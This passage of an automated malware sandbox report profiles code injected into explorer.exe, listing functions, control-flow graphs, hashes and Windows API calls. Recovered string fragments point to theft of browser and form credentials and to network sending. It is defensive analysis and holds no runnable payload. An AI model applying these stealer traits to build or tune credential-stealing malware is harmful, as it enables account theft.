                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction ID: 35ddd22bcd014fafffd269a39859dfe4f3aa016b77df49c8d7a3e9fab93c74bc
                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction Fuzzy Hash: B152A232614B488FCB29EF68D4947E9B7E1FB54300F904A6EC89FC7266DE70A945CB41
                                  Function 0E750232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 299 e750232-e750256 300 e7508bd-e7508cd 299->300 301 e75025c-e750260 299->301 301->300 302 e750266-e7502a0 301->302 303 e7502a2-e7502a6 302->303 304 e7502bf 302->304 303->304 305 e7502a8-e7502ac 303->305 306 e7502c6 304->306 307 e7502b4-e7502b8 305->307 308 e7502ae-e7502b2 305->308 309 e7502cb-e7502cf 306->309 307->309 310 e7502ba-e7502bd 307->310 308->306 311 e7502d1-e7502f7 call e750942 309->311 312 e7502f9-e75030b 309->312 310->309 311->312 316 e750378 311->316 312->316 317 e75030d-e750332 312->317 320 e75037a-e7503a0 316->320 318 e750334-e75033b 317->318 319 e7503a1-e7503a8 317->319 321 e750366-e750370 318->321 322 e75033d-e750360 call e750942 318->322 323 e7503d5-e7503dc 319->323 324 e7503aa-e7503d3 call e750942 319->324 321->316 328 e750372-e750373 321->328 322->321 325 e750410-e750458 NtCreateFile call e750172 323->325 326 e7503de-e75040a call e750942 323->326 324->316 324->323 335 e75045d-e75045f 325->335 326->316 326->325 328->316 335->316 336 e750465-e75046d 335->336 336->316 337 e750473-e750476 336->337 338 e750486-e75048d 337->338 339 e750478-e750481 337->339 340 e7504c2-e7504ec 338->340 341 e75048f-e7504b8 call e750942 338->341 339->320 347 e7504f2-e7504f5 340->347 348 e7508ae-e7508b8 340->348 341->316 346 e7504be-e7504bf 341->346 346->340 349 e750604-e750611 347->349 350 e7504fb-e7504fe 347->350 348->316 349->320 351 e750500-e750507 350->351 352 e75055e-e750561 350->352 355 e750509-e750532 call e750942 351->355 356 e750538-e750559 351->356 357 e750567-e750572 352->357 358 e750616-e750619 352->358 355->316 355->356 362 e7505e9-e7505fa 356->362 363 e750574-e75059d call e750942 357->363 364 e7505a3-e7505a6 357->364 360 e75061f-e750626 358->360 361 e7506b8-e7506bb 358->361 369 e750657-e75066b call e751e92 360->369 370 e750628-e750651 call e750942 360->370 366 e7506bd-e7506c4 361->366 367 e750739-e75073c 361->367 362->349 363->316 363->364 364->316 365 e7505ac-e7505b6 364->365 365->316 373 e7505bc-e7505e6 365->373 374 e7506f5-e750734 366->374 375 e7506c6-e7506ef call e750942 366->375 377 e7507c4-e7507c7 367->377 378 e750742-e750749 367->378 369->316 387 e750671-e7506b3 369->387 370->316 370->369 373->362 397 e750894-e7508a9 374->397 375->348 375->374 377->316 383 e7507cd-e7507d4 377->383 380 e75074b-e750774 call e750942 378->380 381 e75077a-e7507bf 378->381 380->348 380->381 381->397 388 e7507d6-e7507f6 call e750942 383->388 389 e7507fc-e750803 383->389 387->320 388->389 395 e750805-e750825 call e750942 389->395 396 e75082b-e750835 389->396 395->396 396->348 398 e750837-e75083e 396->398 397->320 398->348 402 e750840-e750886 398->402 402->397
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: `
                                  • API String ID: 823142352-2679148245
                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction ID: 360e58e6e8556ff289f17175ed669ac9ae803bbcea4015e456e74021fd45d942
                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction Fuzzy Hash: E8223C71A18A099FCB59DF28C4997AEF7E1FB98301F40462ED85ED3260DB70E951CB81
                                  Function 0E751E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 443 e751e12-e751e6e call e750942 NtProtectVirtualMemory 446 e751e70-e751e7c 443->446 447 e751e7d-e751e8f 443->447
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0E751E67
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction ID: 28f3d96e66530e10eb032da98c00e1011de9b48d75386bc02951816b1ed25595
                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction Fuzzy Hash: 7401B135628B884F9B88EF6CD48422AB7E4FBCD315F000B3EE99AC3254EB70C9414742
                                  Function 0E751E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 448 e751e0a-e751e38 449 e751e45-e751e6e NtProtectVirtualMemory 448->449 450 e751e40 call e750942 448->450 451 e751e70-e751e7c 449->451 452 e751e7d-e751e8f 449->452 450->449
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0E751E67
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction ID: eaf5e4ff1b344f41a3d3469929e0b66ff82aa1094db6eaae92e7141298ca19ad
                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction Fuzzy Hash: D501A235628B884B9B48EF2C94452A6B3E5FBCE315F400B3EE99AC3251DB61D9024782
                                  Function 0E74B8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0E74B9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: f651159ad7eac4fbe9067348976ae50b5f53b6d73c11f73b9c4e1885c93c2037
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: 3131D171614A4C8FCB04EFA8C8887EDB7E0FB58215F40062AD84ED7360DF748A45C789
                                  Function 0E74B8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0E74B9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 2b787f9d178f4e135767d4ae7a63af1e6dc5aedab8d2b1e9c99b4a6bd8b99f89
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 3F21C371614A4C8ECB05EFA8C8487EDBBF0FF58205F40461AD85AD7360DF748A05CB85
                                  Function 0E747B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 232 e747b66-e747b68 233 e747b93-e747bb8 232->233 234 e747b6a-e747b71 232->234 235 e747bbb-e747c22 call e74e612 call e750942 * 2 233->235 234->235 238 e747b73-e747b92 234->238 244 e747cdc 235->244 245 e747c28-e747c2b 235->245 238->233 247 e747cde-e747cf6 244->247 245->244 246 e747c31-e747cb0 call e752da4 call e752022 call e7523e2 call e752022 call e7523e2 245->246 259 e747cb5-e747cca CreateMutexExW 246->259 260 e747cce-e747cd3 259->260 260->244 261 e747cd5-e747cda 260->261 261->247
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction ID: 65721b459c0f1636471978947ceaa2b523eb1d50fd1d0c4f7e7af856038b19df
                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction Fuzzy Hash: 0B414D71914A088FDB54EFA8C8D8BAD77F0FB58300F44466AC84EDB265DF309945CB85
                                  Function 0E747B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction ID: 7dc3aea46c5b6a126d58cf207a4c00ed0df628cc70f60ae8ed762a2af02382dc
                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction Fuzzy Hash: 16412D71918A088FDB54EFA8C8D8BAD77F0FB68300F44456AC84EDB266DF309945CB45
                                  Function 0E74D72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 289 e74d72e-e74d768 290 e74d788-e74d7ab connect 289->290 291 e74d76a-e74d782 call e750942 289->291 291->290
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction ID: f5bcf2f032bebf3e60e4b2b2bc9a54497c85dce1cfb34e0ff7b5fa114e9561fd
                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction Fuzzy Hash: BA014C70618B188FCB94EF1CE088B55B7E0FB58314F1545AAA90DCB226C774C9818BC2
                                  Function 0E74D732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 e74d732-e74d768 295 e74d788-e74d7ab connect 294->295 296 e74d76a-e74d782 call e750942 294->296 296->295
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction ID: 269f450bf29c79d1cf86f094eed67f80367b3f4c62255983c9903009662b38ce
                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction Fuzzy Hash: 2D012C70618A1C8FCB94EF5CE088B55B7E0FB59314F1545AEA90DCB226CBB4CD818BC2
                                  Function 0E74D6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 407 e74d6b2-e74d6e5 408 e74d705-e74d72d send 407->408 409 e74d6e7-e74d6ff call e750942 407->409 409->408
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: send
                                  • API String ID: 2809346765-2809346765
                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction ID: 765437b8f6d0598a29783015cd9ba06a061a789ede35e9cc58b31817fb7a089c
                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction Fuzzy Hash: AE011270518A188FDB84EF1CD448B25B7E0FB58314F1545AED85DCB266C670D8818B81
                                  Function 0E74D5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 412 e74d5b2-e74d5ea 413 e74d5ec-e74d604 call e750942 412->413 414 e74d60a-e74d62b socket 412->414 413->414
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction ID: db50188617c1a9a39b265af4bacc5b75353d62aa56f183d1f845d58911e20f3f
                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction Fuzzy Hash: 5C0121706186188FCB84EF1CD048B54BBE0FB59354F1545ADD85ECB27AC7B0C9818B86
                                  Function 0E7452DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 417 e7452dd-e745320 call e750942 420 e745326 417->420 421 e7453fa-e74540e 417->421 422 e745328-e745339 SleepEx 420->422 422->422 423 e74533b-e745341 422->423 424 e745343-e745349 423->424 425 e74534b-e745352 423->425 424->425 426 e74535c-e74536a call e74ff12 424->426 427 e745354-e74535a 425->427 428 e745370-e745376 425->428 426->428 427->426 427->428 429 e7453b7-e7453bd 428->429 430 e745378-e74537e 428->430 433 e7453d4-e7453db 429->433 434 e7453bf-e7453cf call e745e72 429->434 430->429 432 e745380-e74538a 430->432 432->429 436 e74538c-e7453b1 call e746432 432->436 433->422 438 e7453e1-e7453f5 call e7450f2 433->438 434->433 436->429 438->422
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction ID: 9ee3c24cd48d46c8d597f7a4bdbcf9dbf277a85f87dc873ec36b8f9854ebc245
                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction Fuzzy Hash: 9C317AB4A14B09DFDB64EF6980882A9F7A0FB44304F44467EC92DCB216CBB49890CFD1
                                  Function 0E745412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 453 e745412-e745446 call e750942 456 e745473-e74547d 453->456 457 e745448-e745472 call e752c9e CreateThread 453->457
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538701995.000000000E6C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E6C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e6c0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction ID: d4e8181a54b26c3fd0e91384cee12fa55388c43babc85f5cd845775efa4d5ef7
                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction Fuzzy Hash: 67F0F630668A4C4FD788EF2CD44563AF3E0FBE9215F440A3EA94DC7365DA79C9824B16

                                  Non-executed Functions

                                  Function 0E508D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction ID: 1ec98a847845995f1e1cdacd35b24cb46692a26f04608835c1e3a98b2b99ddad
                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction Fuzzy Hash: 53E16A74618F488FD764EF68C4947AAB7E0FB98300F404E6E969BC7255DF30A941CB89
                                  Function 0E50B792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction ID: 37374ceb2f96fa384672b10619d0ed927d8a8dd63c4ec0bc00b5fa44e8d9aae1
                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction Fuzzy Hash: EDB19B30618B488EDB54EF68C495AEEB7F1FF98300F50496ED49AC7251EF309909CB86
                                  Function 0E509622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: c1d2158ea280506966ce0122a6b8b29fbbd1ee57e52c9b33522d2f294bea05dc
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: 2241B170A18B088FDB14DF88A4456BEBBE2FBC8700F00065EE409D3296DBB59D458BD6
                                  Function 0E510AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction ID: 814c54563901e1cdccf6ce114798b8cb0217d8cdd3473c98f7d15d4217675f2f
                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction Fuzzy Hash: 7EC17B70218B098FD758EF24C495AEAF3E1FF98304F404B6E959AC7250DF70AA55CB86
                                  Function 0E510F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction ID: 237a328cfd875d486b88c0a36f0d8d12e5552d78e7e53ede334c0b6295c1aa27
                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction Fuzzy Hash: 5E51E3305187488FE719DF18C8856AAB7E5FBC5300F501EAEE9CBC7251DBB49946CB82
                                  Function 0E50A2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction ID: 5c1430887156c404bd6d4aec9b855fdf30e4f304941d0e5c44656c421964d684
                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction Fuzzy Hash: AAC1A070618A1A8FCB58EF68D465AAAF3E1FF98300F554B69950EC7251DF30EE01CB85
                                  Function 0E50A2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction ID: 8e7df122831f91215e22b09ff1f491e4eb0168fd55e031d26cfa2305d2a9f045
                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                  • Instruction Fuzzy Hash: 66C1A070618A1A4FCB58EF68D465AAAB3E1FF98300F554B69950EC7251DF30EE01CB85
                                  Function 0E50BCD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction ID: 0df738361e2e2547790a0456fbfded30b760ceac47f4d89086a0990c84b41f93
                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                  • Instruction Fuzzy Hash: 53A1BF706187488BDB18EFA8D4547EEB7E1FF88300F004A6DE58AD7281EF709945C789
                                  Function 0E50BCE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction ID: 78aea6a4fb708a5e8d83b2adefbc458199262554b06d4d12521e5e5319c807ce
                                  • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                  • Instruction Fuzzy Hash: 15919F706187488BDB18EFA8D4547EEB7E1FB88300F004A2DE58AD7281EF709945C789
                                  Function 0E50B352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.4538569614.000000000E4D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E4D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_e4d0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction ID: 1ab56c0a75c1f3be97d8a7b01a14ae320fe6f0e3121f547794fa2e2275ac4ab1
                                  • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                  • Instruction Fuzzy Hash: 21718231618B498FD758EF68C4886AAB7F1FF98304F000A6EE54AC7261EB71D9458B85
                                  Function 0E506C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                  Download Yara Rule
